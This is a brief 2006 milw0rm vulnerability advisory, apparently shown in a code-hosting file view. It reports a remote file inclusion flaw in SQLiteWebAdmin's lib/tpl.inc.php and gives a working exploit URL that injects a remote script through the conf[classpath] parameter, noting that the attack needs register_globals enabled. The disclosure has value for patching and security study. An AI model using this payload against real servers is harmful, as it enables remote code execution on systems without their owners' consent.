22 lines
No EOL
527 B
Text
Executable file
22 lines
No EOL
527 B
Text
Executable file
SQLiteWebAdmin
|
|
http://sourceforge.net/projects/sqlitewebadmin
|
|
|
|
SQLiteWebAdmin is a simple PHP program for administrating
|
|
a SQL DataBase.
|
|
|
|
It suffers of a Remote File Inclusion Vulnerability.
|
|
|
|
The bug is in the "tpl.inc.php" program in the "lib"
|
|
directory, and is exploited when passing the parameter
|
|
"conf[classpath]".
|
|
|
|
http://www.server.com/lib/tpl.inc.php?conf[classpath]=[URL-OF-SCRIPT]
|
|
|
|
Succesfull explotation, needs register_globals=on
|
|
|
|
Att.
|
|
SirDarckCat
|
|
elhacker.net
|
|
|
|
# milw0rm.com [2006-08-07]
|
|
|